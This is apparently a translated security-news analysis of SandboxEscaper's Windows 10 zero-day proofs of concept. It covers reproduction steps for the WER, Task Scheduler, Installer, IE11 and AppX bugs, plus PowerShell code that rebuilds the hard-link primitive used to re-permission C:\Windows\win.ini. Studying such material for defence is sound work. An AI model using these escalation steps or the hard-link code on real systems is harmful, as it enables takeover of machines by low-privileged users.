What is the SandboxEscaper disclosure vulnerability POC research report?

2025-02-24 update. From: SLTechnology News&Howtos > Network Security


Shulou (Shulou.com) 05/31 report

This article examines the proof-of-concept code that SandboxEscaper disclosed: it walks through each of the five vulnerabilities and its reproduction steps, and then analyses the AppX patch bypass in detail.

Event overview

Security researcher SandboxEscaper recently published demonstration exploit code for five Windows 10 zero-day vulnerabilities on GitHub.

The POCs cover:

Windows Error Reporting

Windows Task Scheduler

Windows Installer

IE11 sandbox escape

Windows AppX Deployment Service

Apart from the first and the fifth zero-days, the other three have been public since 2018.

Vulnerability details

Windows Error Reporting zero-day

1. Exploitation conditions:

The bug is a race in how the service manipulates a DACL (discretionary access control list):

When we trigger the report queue task, the WER service tries to delete two files. To make sure SYSTEM is able to delete them, it first rewrites their DACLs. It does this in two steps:

a. Call GetFileSecurity to obtain the file's security descriptor

b. Add an ACE to that security descriptor granting SYSTEM delete permission, then write it back with SetFileSecurity

The service closes its file handle between the two calls and addresses the file by path each time. So if we swap the path for a hard link between the two calls, the service first reads the security descriptor from an ordinary file that the user can write to,

then copies those permissions and applies the resulting security descriptor to whatever the hard link now points at, which is a completely different file.

In a successful run (the Process Monitor trace in the original post) the hard link is created after the QuerySecurityFile operation and before the SetSecurityFile operation. You can confirm this by opening wer.dll in IDA: the function being attacked is UtilAddAccessToPath.
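The two-step DACL update described above, as an added example that is neither SandboxEscaper's nor wer.dll's code: the same "read the DACL by path, add an ACE, write the DACL back by path" sequence next to the handle-based form, which is not exposed to the hard-link swap. It assumes Windows PowerShell 5.1 (.NET Framework, where FileStream has GetAccessControl and SetAccessControl) and a scratch file under %TEMP% that you own; the function names are the example's own.

```powershell
# Added example (not SandboxEscaper's or wer.dll's code): the two-step DACL update that
# UtilAddAccessToPath performs, written by path (racy) and by handle (race-free).
# Windows PowerShell 5.1, run against a scratch file you own; no privileges needed.

$SystemSid = New-Object System.Security.Principal.SecurityIdentifier(
    [System.Security.Principal.WellKnownSidType]::LocalSystemSid, $null)

function New-SystemDeleteAce {
    # Allow ACE granting SYSTEM the Delete right, the ACE WER adds before deleting.
    New-Object System.Security.AccessControl.FileSystemAccessRule(
        $SystemSid,
        [System.Security.AccessControl.FileSystemRights]::Delete,
        [System.Security.AccessControl.AccessControlType]::Allow)
}

# Racy pattern (what the bug abuses): two separate lookups of the same path,
# GetFileSecurity(path) ... SetFileSecurity(path). A caller running as SYSTEM in a
# user-controlled directory can be redirected: delete the file and drop a hard link
# under the same name between the two calls, and the ACE is written to the link's target.
function Add-SystemDeleteAceByPath {
    param([Parameter(Mandatory)][string]$Path)
    $acl = Get-Acl -LiteralPath $Path           # lookup 1: read the DACL by name
    $acl.AddAccessRule((New-SystemDeleteAce))
    Set-Acl -LiteralPath $Path -AclObject $acl  # lookup 2: write it back by name
}

# Race-free pattern: open once with exactly the rights needed (READ_CONTROL | WRITE_DAC),
# then query and set the DACL through that handle. The ACE lands on the object that was
# opened whatever the name points at later, and FileShare.None keeps anyone from deleting
# or re-linking the file while the handle is held.
function Add-SystemDeleteAceByHandle {
    param([Parameter(Mandatory)][string]$Path)
    $rights = [System.Security.AccessControl.FileSystemRights]'ReadPermissions, ChangePermissions'
    $fs = New-Object System.IO.FileStream($Path, [System.IO.FileMode]::Open, $rights,
        [System.IO.FileShare]::None, 4096, [System.IO.FileOptions]::None)
    try {
        $acl = $fs.GetAccessControl()           # GetSecurityInfo(handle)
        $acl.AddAccessRule((New-SystemDeleteAce))
        $fs.SetAccessControl($acl)              # SetSecurityInfo(handle)
    } finally {
        $fs.Dispose()
    }
}

# Demo on a constructed scratch file, then show the SYSTEM ACE that was added.
$scratch = Join-Path $env:TEMP 'wer-dacl-demo.txt'
Set-Content -LiteralPath $scratch -Value 'constructed sample file'
Add-SystemDeleteAceByHandle -Path $scratch
(Get-Acl -LiteralPath $scratch).Access |
    Where-Object { $_.IdentityReference.Value -eq 'NT AUTHORITY\SYSTEM' } |
    Format-Table IdentityReference, FileSystemRights, AccessControlType -AutoSize
```

The demo cannot reproduce the race itself, since the vulnerable side runs as SYSTEM inside the WER service; what it shows is the difference between the two patterns. In the by-path version, anyone who can delete the file and create a hard link under the same name between the two calls gets the new ACE written onto the link's target. In the by-handle version the DACL is read and written on the object that was opened, and the handle is held without sharing so the name cannot be swapped underneath it. On PowerShell 7 the same calls are the extension methods [System.IO.FileSystemAclExtensions]::GetAccessControl($fs) and ::SetAccessControl($fs, $acl).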

2. Reproduction steps:

a. Copy AngryPolarBearBug.exe and report.wer into the same folder

b. Run AngryPolarBearBug.exe

This bug has a low success rate because the trigger is hard to control (it can take up to 15 minutes for the race to hit; if it takes longer, close the program and clean out the cached data folder), and it had already been patched by the time of disclosure.

Windows Task Scheduler zero-day

1. Exploitation conditions

Windows 10 has two tasks folders:

A. C:\Windows\Tasks

B. C:\Windows\System32\Tasks

The first is kept for backwards compatibility; the second is the one the Windows 10 Task Scheduler actually uses. On older systems (Windows XP), tasks in the legacy ".job" file format were placed in C:\Windows\Tasks.

To import a .job file into the Task Scheduler on Windows 10, you first copy the old .job file into C:\Windows\Tasks and then run the following command using schtasks.exe and schedsvc.dll copied from the old system:

schtasks /change /TN "taskname" /RU username /RP password

This results in a call to the RPC method _SchRpcRegisterTask, which the Task Scheduler service exposes. To trigger the bug you can call this method directly instead of copying schtasks.exe from Windows XP.

The call starts out under the current user's privileges, but when it reaches the following function:

int __stdcall tsched::SetJobFileSecurityByName(LPCWSTR StringSecurityDescriptor, const unsigned __int16 *, int, const unsigned __int16 *)

it runs as NT AUTHORITY\SYSTEM,

and then calls SetSecurityInfo on the task file created in C:\Windows\System32\Tasks.

2. Reproduction steps

a. Copy polarbear.exe, bear.job, schtasks.exe and schedsvc.dll from the "poc files" folder to the test VM

b. Run polarbear.exe, passing the user name and password of a local non-administrator account.

To trigger this vulnerability you first need a valid user name and password. That is not a high bar; plenty of attacker tooling can obtain them.

Windows Installer zero-day

1. Exploitation conditions

When Windows Installer repairs an installed program there is a brief window (a race condition) during which the process can be hijacked into writing files to locations in the Windows operating system that the user is not authorised to write to.

This bug in the msiexec /fa (repair) operation can be used to plant malware and take over a computer on which the attacker initially had only a low-privileged account.

2. Reproduction steps

a. Run polarbear.exe (make sure test.rbf and test.rbs are in the same directory)

b. From a command prompt, run a repair of an .msi that is located in the C:\Windows\Installer directory, for example: msiexec /fa C:\Windows\Installer\123123213.msi

Reproducing this bug also involves some luck: the race has to be won during the repair, while quickly clicking the back button.

IE11 sandbox escape zero-day

1. Exploitation conditions

The flow is relatively simple. The injected code writes target.link into the user's %USERPROFILE%\Favorites directory and then, communicating with IE through a COM component, runs the hard-coded script alert('wtf').

2. Reproduction steps

a. InjectDll.exe PID TestDll.dll

The key to this bug is obtaining a handle to the IE11 process and injecting the target module into it so that the malicious code runs. Clearly this zero-day cannot be used remotely and should be regarded as a lower-impact issue.

Windows AppX Deployment Service zero-day

1. Exploitation conditions

This is a flaw in how the Windows AppX Deployment Service (AppXSVC) handles hard links; it is a bypass of the fix for CVE-2019-0841.

The exploit first checks whether the target file exists and, if so, checks its permissions. Because the attack goes through Microsoft Edge, it kills Microsoft Edge so that it can get at the settings.dat file.

Once Microsoft Edge has been killed, it inspects settings.dat, deletes it, and creates a hard link in its place pointing at the requested target file. With the hard link in place, Microsoft Edge is started again to trigger the vulnerability. Finally it checks whether Full Control has in fact been granted to the current user.

Microsoft shipped a patch in April, but the exploit still works against the patched code.

2. Reproduction steps

a. Run polarbear.exe

b. Run windowsappslpe.exe

This vulnerability bypasses the patch Microsoft issued for CVE-2019-0841: the exploit creates the hard link up front, before the patched code path runs.

Reproduction and detailed analysis of the Windows AppX vulnerability

Let's run polarbear.exe directly and analyse how it works:

a. It creates the subdirectory \Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Microsoft.MicrosoftEdge_44.17763.1.0_neutral__8wekyb3d8bbwe under the user data directory %LOCALAPPDATA%

for the attack to use.


b. It opens a file with NtOpenFile, with OBJ_CASE_INSENSITIVE set in the object attributes

c. It sets file information with ZwSetInformationFile, passing a FILE_LINK_INFORMATION structure whose ReplaceIfExists field is TRUE, with FileLinkInformation as the FILE_INFORMATION_CLASS

d. Finally it calls the wrapper function CreateNativeHardlink, passing the hard link to create, L"\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Microsoft.MicrosoftEdge_44.17763.1.0_neutral__8wekyb3d8bbwe\bear3.txt",

and the file whose permissions are to be modified, "C:\Windows\win.ini".

At this point the hard link has been created.
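Steps b to d above, as an added example that is not the POC's own code: the same primitive, a handle opened on the target and NtSetInformationFile with FileLinkInformation and ReplaceIfExists set, rebuilt through P/Invoke in PowerShell so you can test whether your own build still lets a user create a hard link to a file it can only read. It assumes Windows PowerShell 5.1 or later, a scratch directory under %LOCALAPPDATA% standing in for the Packages subdirectory the POC creates, and C:\Windows\win.ini as the target, as on the page; the class and function names are the example's own.

```powershell
# Added example (not the POC's code): NtSetInformationFile + FileLinkInformation, the
# native hard-link primitive described above, rebuilt via P/Invoke. Windows PowerShell 5.1+.

Add-Type -TypeDefinition @'
using System;
using System.Runtime.InteropServices;

public static class NativeLink
{
    [StructLayout(LayoutKind.Sequential)]
    public struct IO_STATUS_BLOCK { public IntPtr Status; public IntPtr Information; }

    [DllImport("ntdll.dll")]
    static extern int NtSetInformationFile(IntPtr FileHandle, ref IO_STATUS_BLOCK IoStatusBlock,
        IntPtr FileInformation, int Length, int FileInformationClass);

    const int FileLinkInformation = 11;

    // FILE_LINK_INFORMATION built by hand because it ends in a variable-length name:
    // BOOLEAN ReplaceIfExists (padded to pointer size), HANDLE RootDirectory,
    // ULONG FileNameLength (bytes), then WCHAR FileName[] with no terminator.
    public static int CreateNativeHardlink(IntPtr targetHandle, string linkNtPath, bool replaceIfExists)
    {
        byte[] name = System.Text.Encoding.Unicode.GetBytes(linkNtPath);
        int offRoot = IntPtr.Size, offLen = 2 * IntPtr.Size, offName = 2 * IntPtr.Size + 4;
        int size = offName + name.Length;
        IntPtr buf = Marshal.AllocHGlobal(size);
        try
        {
            for (int i = 0; i < size; i++) Marshal.WriteByte(buf, i, 0);
            Marshal.WriteByte(buf, 0, (byte)(replaceIfExists ? 1 : 0));
            Marshal.WriteIntPtr(buf, offRoot, IntPtr.Zero);   // no root directory: full NT path
            Marshal.WriteInt32(buf, offLen, name.Length);
            Marshal.Copy(name, 0, IntPtr.Add(buf, offName), name.Length);
            IO_STATUS_BLOCK iosb = new IO_STATUS_BLOCK();
            return NtSetInformationFile(targetHandle, ref iosb, buf, size, FileLinkInformation);
        }
        finally { Marshal.FreeHGlobal(buf); }
    }
}
'@

function New-NativeHardlink {
    param(
        [Parameter(Mandatory)][string]$Target,    # existing file the link will point at
        [Parameter(Mandatory)][string]$LinkPath,  # new name to create, same volume
        [switch]$ReplaceIfExists
    )
    # Only read access is requested on the target; whether that is enough to link to it
    # is exactly the property being tested.
    $fs = New-Object System.IO.FileStream($Target, [System.IO.FileMode]::Open,
        [System.IO.FileAccess]::Read, [System.IO.FileShare]::ReadWrite)
    try {
        $ntPath = '\??\' + [System.IO.Path]::GetFullPath($LinkPath)
        $status = [NativeLink]::CreateNativeHardlink($fs.SafeFileHandle.DangerousGetHandle(),
            $ntPath, [bool]$ReplaceIfExists)
    } finally {
        $fs.Dispose()
    }
    if ($status -ne 0) {
        # 0xC0000022 (STATUS_ACCESS_DENIED) means this build will not link a file the
        # caller cannot write to, so the precondition the bypass relies on is gone.
        throw ('NtSetInformationFile failed, NTSTATUS 0x{0:X8}' -f $status)
    }
}

$dir  = Join-Path $env:LOCALAPPDATA 'hardlink-test'   # stands in for the Packages subdirectory
New-Item -ItemType Directory -Force -Path $dir | Out-Null
$link = Join-Path $dir 'bear3.txt'
New-NativeHardlink -Target 'C:\Windows\win.ini' -LinkPath $link -ReplaceIfExists
# A hard link is just a second name for the same file: LinkType reads HardLink and
# Target lists the other name(s).
Get-Item -LiteralPath $link | Select-Object FullName, LinkType, Target
```

The structure is laid out by hand because P/Invoke cannot marshal a struct that ends in a variable-length name, and the offsets follow IntPtr.Size so the same code works on 32-bit and 64-bit. If the call succeeds as a standard user, any file that user can read on the volume can be given a second name inside a directory the user controls, which is the setup the POC needs; if it fails with STATUS_ACCESS_DENIED, that build no longer allows it.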

The environment for bypassing the patch is now in place, but we still need CVE-2019-0841 itself to achieve the local privilege escalation.

The vulnerability revolves around DACL handling. Put simply, if a Windows object has no discretionary access control list (DACL), the system grants everyone full access to it; if the object has a DACL, the system allows only the access explicitly granted by the access control entries (ACEs) in that DACL.

Let's focus on settings.dat, a Microsoft Edge file that plays the key role in this exploit. The per-user settings of all Windows apps are stored under the current user's AppData folder.

Windows 10 ships with a number of default applications, and each package has a settings.dat file, as mentioned above.

NT AUTHORITY\SYSTEM writes any configuration changes to this file. Once the Windows app has started, the system takes an oplock (opportunistic lock) on the file to keep other processes from using or accessing it while the app is running.

When we start Microsoft Edge, the process opens settings.dat as NT AUTHORITY\SYSTEM.

When the file is opened, some basic integrity checks are performed:

a. Check the file permissions and, if they are wrong, reset them to the correct permissions

b. Read the file's contents and delete the file if they are corrupted

c. Recreate it by copying the settings template from C:\Windows\System32\settings.dat

d. Continue starting the Windows app

So the program that runs the POC does at least three things:

(1) To exploit the vulnerability it first checks whether the target file exists and, if so, checks its permissions. Because the attack goes through Microsoft Edge, it kills Microsoft Edge so that it can get at the settings.dat file.

(2) Once Microsoft Edge has been killed, it inspects and deletes settings.dat so that it can create a hard link under that name pointing at the requested target file (win.ini).

(3) With the hard link in place, Microsoft Edge is started again to trigger the vulnerability: the permission fix-up in step a above is applied to the hard link, and therefore to the target. Finally it checks whether Full Control has in fact been granted to the current user.

The original article shows the target file's permissions before and after execution (Full Control for the current user afterwards).

Vulnerability summary and security recommendations

From the analysis above, the basic prerequisites for triggering the vulnerability are:

NT AUTHORITY\SYSTEM has Full Control of the target file

Low-privileged users or the Users group have read/execute permission on it
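The two prerequisites above turned into a check, as an added example that is not part of the original article: it reads each file's DACL and reports whether SYSTEM holds Full Control and a low-privileged principal (BUILTIN\Users, Authenticated Users or Everyone) holds read and execute but no write rights, the combination that makes a file a candidate target for this kind of hard-link re-permissioning. It assumes Windows PowerShell 5.1 and scans the files directly under C:\Windows, which include the win.ini target the POC used; the function and field names are the example's own.

```powershell
# Added example (not from the original article): flag files that meet the two
# preconditions listed above. Windows PowerShell 5.1; SIDs rather than names are
# compared so the check is independent of the system language.

$SidSystem   = 'S-1-5-18'                                # NT AUTHORITY\SYSTEM
$SidLowPriv  = 'S-1-5-32-545', 'S-1-5-11', 'S-1-1-0'     # BUILTIN\Users, Authenticated Users, Everyone
$FullControl = [System.Security.AccessControl.FileSystemRights]::FullControl
$ReadExecute = [System.Security.AccessControl.FileSystemRights]::ReadAndExecute
$WriteBits   = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, WriteExtendedAttributes, WriteAttributes'

function Test-HardlinkTargetCandidate {
    param([Parameter(Mandatory)][string]$Path)
    $acl = Get-Acl -LiteralPath $Path
    # Explicit and inherited entries, identities resolved to SIDs.
    $rules = $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
    $allow = $rules | Where-Object { $_.AccessControlType -eq 'Allow' }

    # Precondition 1: SYSTEM has Full Control (all FullControl bits present in one ACE).
    $systemFull = [bool]($allow | Where-Object {
        $_.IdentityReference.Value -eq $SidSystem -and
        ($_.FileSystemRights -band $FullControl) -eq $FullControl })

    # Precondition 2: a low-privileged principal can read and execute but not write.
    $lowPriv  = $allow | Where-Object { $SidLowPriv -contains $_.IdentityReference.Value }
    $lowRead  = [bool]($lowPriv | Where-Object { ($_.FileSystemRights -band $ReadExecute) -eq $ReadExecute })
    $lowWrite = [bool]($lowPriv | Where-Object { ($_.FileSystemRights -band $WriteBits) -ne 0 })

    [pscustomobject]@{
        Path         = $Path
        Owner        = $acl.Owner
        SystemFull   = $systemFull
        LowPrivRead  = $lowRead
        LowPrivWrite = $lowWrite
        Candidate    = ($systemFull -and $lowRead -and -not $lowWrite)
    }
}

# Files directly under C:\Windows, which include the win.ini target the POC used.
Get-ChildItem -LiteralPath 'C:\Windows' -File -ErrorAction SilentlyContinue |
    ForEach-Object { Test-HardlinkTargetCandidate -Path $_.FullName } |
    Sort-Object Candidate -Descending |
    Format-Table Path, SystemFull, LowPrivRead, LowPrivWrite, Candidate -AutoSize
```

Deny ACEs and the caller's actual effective access are not evaluated; the two conditions are the page's heuristic, not a full access check. A file flagged Candidate only matters if the user can also create a hard link to it from a directory they control on the same volume, which this script does not attempt.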

Security recommendations:

Download and install Windows updates to patch these vulnerabilities

Do not run programs of unknown origin

Install reputable antivirus software and keep it up to date


© 2024 shulou.com SLNews company. All rights reserved.
